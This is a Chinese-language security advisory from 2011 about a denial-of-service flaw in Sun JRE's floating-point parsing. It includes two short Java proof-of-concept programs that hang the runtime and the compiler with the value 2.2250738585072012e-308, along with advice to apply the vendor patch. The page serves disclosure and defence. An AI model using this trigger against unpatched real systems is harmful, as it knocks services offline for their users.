Sun Java浮点值拒绝服务漏洞

发布日期：2011-02-01
更新日期：2011-02-01受影响系统：
Sun JRE 1.3.1 - 1.6_17
描述：
--------------------------------------------------------------------------------
Java运行时环境（JRE）为JAVA应用程序提供可靠的运行环境。 Sun Java在实现上存在远程拒绝服务漏洞，远程攻击者可利用此漏洞造成用Java编写的应用程序挂起造成拒绝服务。此漏洞源于FloatingDecimal.java中的“correction loop”。<*来源：Konstantin Preisser
*>测试方法：
--------------------------------------------------------------------------------警告以下程序（方法）可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！Konstantin Preisser （）提供了如下测试方法：Send a Java Program Into An Infinite LoopCompile this program and run it; the program will hang （at least it does on a 32-bit system with the latest JRE/JDK）:class runhang {
public static void main（String[] args） {
System.out.println（"Test:"）;
double d = Double.parseDouble（"2.2250738585072012e-308"）;
System.out.println（"Value: " + d）;
}
}Send the Java Compiler Into An Infinite LoopTry to compile this program; the compiler will hang:class compilehang {
public static void main（String[] args） {
double d = 2.2250738585072012e-308;
System.out.println（"Value: " + d）;
}
}建议：
--------------------------------------------------------------------------------
厂商补丁：Sun
---
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：http://sunsolve.sun.com/securityIBM DB2 Administration Server远程缓冲区溢出漏洞Cisco WebEx WRF和ARF文件格式处理多个远程缓冲区溢出漏洞相关资讯 Sun

Sun 要 Google 为 Java 授权付 5 （04/26/2012 06:10:24）
不落的太阳！体验一款源自Sun的开（10/08/2011 06:15:11）
Sun前CEO：如果当年收购苹果如今（02/26/2011 16:53:30）

谷歌将与Sun达成2800万美元的Java （10/18/2011 09:37:43）
分析Sun没落原因：高层重硬件轻软（03/05/2011 06:35:45）
Sun被收购一年后：甲骨文是否成功（02/14/2011 20:50:38）

本文评论查看全部评论（0）

评论声明

尊重网上道德，遵守中华人民共和国的各项有关法律法规
承担一切因您的行为而直接或间接导致的民事或刑事法律责任
本站管理人员有权保留或删除其管辖留言中的任意内容
本站有权在网站内转载或引用您的评论
参与本评论即表明您已经阅读并接受上述条款